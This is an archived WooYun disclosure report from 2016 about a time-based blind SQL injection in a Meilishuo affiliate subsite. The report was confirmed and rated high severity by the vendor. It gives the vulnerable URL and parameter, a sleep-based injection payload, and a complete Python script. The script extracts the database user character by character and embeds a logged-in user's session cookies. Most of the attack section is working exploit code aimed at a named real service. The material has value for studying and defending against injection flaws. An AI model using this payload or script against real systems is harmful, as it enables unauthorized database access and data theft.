乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-21: 细节已通知厂商并且等待厂商处理中 2016-03-22: 厂商已经确认,细节仅向厂商公开 2016-04-01: 细节向核心白帽子及相关领域专家公开 2016-04-11: 细节向普通白帽子公开 2016-04-21: 细节向实习白帽子公开 2016-05-06: 细节向公众公开
美丽说某分站Time-based blind SQL注入一枚
问题站点: http://lm.meilishuo.com/union/pro_manage/?sort=0&catalog=0&type=1&content=%E6%97%B6%E5%B0%9A%E8%BF%90%E5%8A%A8%E5%B0%8F%E7%99%BD%E9%9E%8B 其中content参数存在注入点: payload:
' AND (if (1=1,sleep(5),1)) AND 'fuck'='fuck
动手写个脚本盲注:
#!/usr/bin/env/python#-*- coding:utf-8 -*-__author__ = 'BlackYe.'import urllibimport urllib2import time,sysuser_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36"cookie = '''SEASHELL=CggNLVbq0albM21uBLUOAg==; PHPSESSID=b1n7el3d5pbgee9codgvkh9ti3; shop_unlogin_gray_preview=2806; nsessid=gMRlXeLKuomzPrtu0zswg7Oi; _pzfxuvpc=1458230279892%7C6143346960133899759%7C1%7C1458230279897%7C1%7C%7C1122013430142212671; Hm_lvt_91f81dadcff336ae93c874de253c61ff=1458230057; Hm_lpvt_91f81dadcff336ae93c874de253c61ff=1458230397; MEILISHUO_REFER=default; santorini_mm=e0405ff84180864a6fc7cbe2b650fd44; CHANNEL_FROM=0; _ga=GA1.2.1052119354.1458230096; query_param_r=welcome-main%3A_page_code%3Dwelcome-main.2_mapp-myCenter; r_mark=welcome-main%3A_page_code%3Dwelcome-main.2_mapp-myCenter; MEILISHUO_MM=688d2bd78c48fadad4ec245ed8b9568d; pgv_pvi=6804349952; pgv_si=s9015797760; numInCart=0; MEILISHUO_GLOBAL_KEY=05e675f4bfa391113160317234814904; Hm_lvt_dde72e241ea4e39b97eca9a01eea2dda=1458230625; Hm_lpvt_dde72e241ea4e39b97eca9a01eea2dda=1458462341; MEILISHUO_RZ=1549874950; MLS_S_RZ=1549874950; MEILISHUO_UID_KEY=42451fdebdb8798eae96d0ad6c06722f; LOGON_FROM=; MEILISHUO_UNION_LOGING_USERID=516624981; Hm_lvt_6546c47dcaaac00ad0aff6b94ebe9213=1458230207; Hm_lpvt_6546c47dcaaac00ad0aff6b94ebe9213=1458552096 '''class TimeBaseInject(object): def __init__(self, url): self.url = url self.result = '' self.payload_time = 3 def run(self): ipos = 1 while True: s = self.match(ipos) result_chr = chr(s) if result_chr == chr(32): break self.result = self.result + result_chr.lower() sys.stdout.write('\r\n\r\n') print self.result ipos = ipos + 1 def send_inject(self, target_url): request = urllib2.Request(target_url) request.add_header("User-Agent", user_agent) request.add_header("Cookie", cookie) start_time = time.time() try: urllib2.urlopen(request).read() return self.is_returnok(start_time) except Exception,e: print str(e) return False def match(self, ipos): sys.stdout.write("[CrackING]") for i in range(0,127): payload = "' AND (if (substr(user(), %d ,1)='%s', sleep(%d), 1)) AND 'fuck'='fuck" % (ipos, chr(i),self.payload_time) #print payload sys.stdout.write(".") sys.stdout.flush() target_url = self.url + urllib.quote(payload) if self.send_inject(target_url): return i def is_returnok(self, start_time): return (time.time() - start_time) >= self.payload_timedef main(): url = 'http://lm.meilishuo.com/union/pro_manage/?sort=0&catalog=0&type=1&content=%E6%97%B6%E5%B0%9A%E8%BF%90%E5%8A%A8%E5%B0%8F%E7%99%BD%E9%9E%8B' s = TimeBaseInject(url) s.run()if __name__ == '__main__':main()
Current DB user:
[email protected]
过滤或转义~~~
危害等级:高
漏洞Rank:10
确认时间:2016-03-22 12:11
非常感谢您对美丽说安全的关注,经验证该漏洞真实存在,已联系相关同学修复,谢谢!
暂无